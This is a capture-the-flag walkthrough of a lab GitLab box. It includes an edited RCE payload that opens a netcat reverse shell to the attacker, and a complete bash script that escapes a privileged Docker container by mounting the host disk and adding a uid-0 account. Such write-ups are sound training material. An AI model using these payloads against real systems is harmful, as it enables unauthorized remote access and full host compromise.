Port Scanning and General Enumeration (Nmap)
nmap -sV -sC -oN nmap/initial -T4 10.10.10.220
Only two ports come back open: 22 (SSH) and 5080 (HTTP, and that web server is where GitLab lives).
Access (searchsploit, gitlab)
Let’s see what version of GitLab we’re working with. Log in, open the drop-down menu at the top right and go to Help; the version is printed at the top of that page.
GitLab version 11.4.7
Checking searchsploit for public exploits for GitLab 11.4.7. The first hit is the authenticated RCE script; it needs a valid account, which we have, since registration is open.
I used the first one, but it requires a bit of editing: the stock payload never gave me a shell, so I swapped it for a plain nc reverse shell. Here’s the line I changed it to (replace YOURIP and YOURPORT with your listening IP and port, respectively; the escaping has to stay exactly as shown, because the string is a Ruby open() call being embedded inside a Python string):
open(\\'|""" + f'nc -e /bin/bash YOURIP YOURPORT' + """ \\').read\\"]
The original wouldn’t work; this one should.
Start a listener on the port you put in the payload:
nc -lvnp 4444
And run the script (the listener port flag is the capital -P; -p is the GitLab password):
python3 exploit.py -u YOURUSERNAME -p YOURPASSWORD -g http://10.10.10.220 -l YOURIP -P YOURPORT
You may want to stabilize your shell at this point. A quick and dirty way to do so is to spawn a pty and set a terminal type:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Privesc Part 1 (password-reuse, linpeas)
Linpeas kicks back a lot of juicy information, but this box has some curveballs and 90% of it is irrelevant for the completion of this box. This is definitely a case of K.I.S.S. (keep it simple, stupid).
The two things we’re after here are a plaintext password sitting in a config file, and the fact that we are inside a Docker container. Keep that second one in mind for later.
First thing you should always do when you find a plaintext password? Use it! Use it everywhere: su to root in the shell you already have, and try it over SSH as well. Here it gets us root inside the container.
Let’s capture the root fla— except there is no root.txt, because this root is the root of a Docker container, not of the host.
Well, let’s try and escape the docker then!
Privesc Part 2: ESCAPE-trick boogaloo (deepce, docker escape)
First things first when trying to do anything: enumeration. We’ll be using deepce, a container-enumeration script that works much like Linpeas. It’s amazing.
The interesting finding: the container is running as privileged.
A privileged container gets the full capability set (CAP_SYS_ADMIN included) and can see the host’s block devices under /dev, so as root inside it we can mount the host’s disk and write to the host’s filesystem as root. That is the whole escape.
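To make the privileged check and the escape concrete, here is an added example (mine, not deepce’s code and not from the original writeup) that decodes CapEff from /proc/self/status to confirm CAP_SYS_ADMIN, locates a host block device, mounts it, and drops a uid-0 account into the host’s /etc/passwd. The disk name /dev/sda1, the mount point /mnt/host and the user name pwn are assumptions; adjust them for the box.

```shell
#!/bin/bash
# Added example for this writeup: manual version of the privileged-container
# escape that deepce's PRIVILEGED exploit automates. Assumed (hypothetical)
# values: host root partition found under /dev, mount point /mnt/host, new
# uid-0 user "pwn". Nothing here is run unless invoked as: ./escape.sh run [user] [pass]

# Pull the CapEff hex mask out of a /proc/<pid>/status stream on stdin.
capeff_from_status() {
    awk '/^CapEff:/ { print $2; exit }'
}

# Return 0 if bit 21 (CAP_SYS_ADMIN, needed for mount(2)) is set in the mask.
# --privileged yields a full mask such as 0000003fffffffff; a default Docker
# container gets 00000000a80425fb, which has that bit clear.
capeff_has_sys_admin() {
    hex="${1:-0}"
    [ $(( (0x$hex >> 21) & 1 )) -eq 1 ]
}

# Privileged containers see the host's block devices. Print the first
# plausible root partition, or nothing if none is visible.
find_host_disk() {
    ls /dev/sd?1 /dev/vd?1 /dev/nvme?n1p1 2>/dev/null | head -n 1
}

# Append a uid-0 account with a precomputed crypt hash to <root>/etc/passwd.
# The hash goes straight into the passwd field: pam_unix only consults shadow
# when that field is "x", so no shadow edit is needed. Refuses to clobber an
# existing account of the same name.
add_host_root_user() {
    root="$1"; name="$2"; hash="$3"
    passwd="$root/etc/passwd"
    [ -w "$passwd" ] || return 1
    grep -q "^$name:" "$passwd" && return 1
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$name" "$hash" >> "$passwd"
}

# Full escape: check capabilities, mount the host disk, add the user.
escape_privileged() {
    name="${1:-pwn}"; pass="${2:-pwn}"; mnt=/mnt/host
    capeff_has_sys_admin "$(capeff_from_status < /proc/self/status)" || {
        echo "no CAP_SYS_ADMIN: not a privileged container, try another route"
        return 1
    }
    disk="$(find_host_disk)"
    [ -n "$disk" ] || { echo "no host block device visible"; return 1; }
    mkdir -p "$mnt" && mount "$disk" "$mnt" || return 1
    # openssl passwd -6 produces a SHA-512 crypt hash the host's PAM will accept
    add_host_root_user "$mnt" "$name" "$(openssl passwd -6 "$pass")" || return 1
    echo "added $name (uid 0) to $mnt/etc/passwd; now: ssh $name@<host>"
}

if [ "${1:-}" = run ]; then
    shift
    escape_privileged "$@"
fi
```

One caveat before relying on the SSH step: sshd applies PermitRootLogin to any uid-0 account, not just the one named root, so if the host disallows root logins you would instead chroot into /mnt/host from the container or add an SSH key under /mnt/host/root/.ssh. On this box the SSH route works.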
The other cool feature of deepce is that it has an exploit mode. The PRIVILEGED exploit mounts the host’s disk and adds the username and password you pass in as a new uid-0 account on the host:
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
You can read about the available exploits by following the link in Reading/Resources above.
All that’s left to do is ssh in to the box as the new root user with those credentials and grab root.txt.